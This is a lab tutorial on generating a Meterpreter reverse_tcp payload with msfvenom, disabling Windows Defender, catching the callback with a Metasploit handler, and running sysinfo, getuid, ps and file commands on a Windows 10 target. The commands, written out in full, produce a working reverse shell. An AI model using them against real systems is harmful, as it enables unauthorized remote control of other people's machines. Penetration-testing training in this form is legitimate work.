In order to establish a connection between metasploit and your target machine, it is necessary to create a payload. The payload is a program that contains malicious code to allow a backdoor between you and the target machine. Creating the payload is relatively easy using msfvenom. What is difficult is getting the payload onto the target machine through social engineering, and getting it past the various virus scanners that are commonly used.
In this exercise, we will be turning off the windows defender virus tools on windows 10 in order to create a simple payload and connection between us and the target machine in our virtual lab.
we will create a payload with the reverse_tcp function. So open up your terminal and execute the following command
1 - msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.2.4 lport=1234 -f exe >win10.exe
Now you will find the created .exe file in your linux directory
You would now need to find a way to get this file onto the target system and executed. There are various ways this can be done, and more advanced methods of disguising the file. These are outside the scope of this tutorial. Let us just assume that the file is now on the target windows machine and ready to be executed.
So in preparation we need to setup our machine to listen for the connection when the payload is run.
Open up your terminal and start metasploit by running msfconsole
$ msfconsole >
Now we will setup metasploit to listen for the incoming connection as follows
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.2.4
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > exploit
now once the .exe file is run on our target machine a connection will be established
We are now connected to the target machine and can start to do some interesting things. First however, let’s find out about the machine we are connected to by using the sys info command
meterpreter > sysinfo
we can also find out the user ID of the person currently logged into the system with getuid command
meterpreter > getuid
we can see what processes are running using ps command
meterpreter > ps
e can execute a program, for example, we could remotely start the notepad application by the command
meterpreter > execute -f notepad.exe
you will see on your remote windows machine the notepad application open.
finally, we will upload a file to the target machine. On our machine we have a text file named “you_have_been_hacked.txt” in the directory home/kali. The file will upload the directory we are currently in on the target machine. By default when connecting you will be in the directory that the payload was stored. You can use cd /xxxxxx commands to change directory. In our case we have navigated to the desktop directory of the user on the target machine. You can check where you are by using the dir command.
meterpreter > dir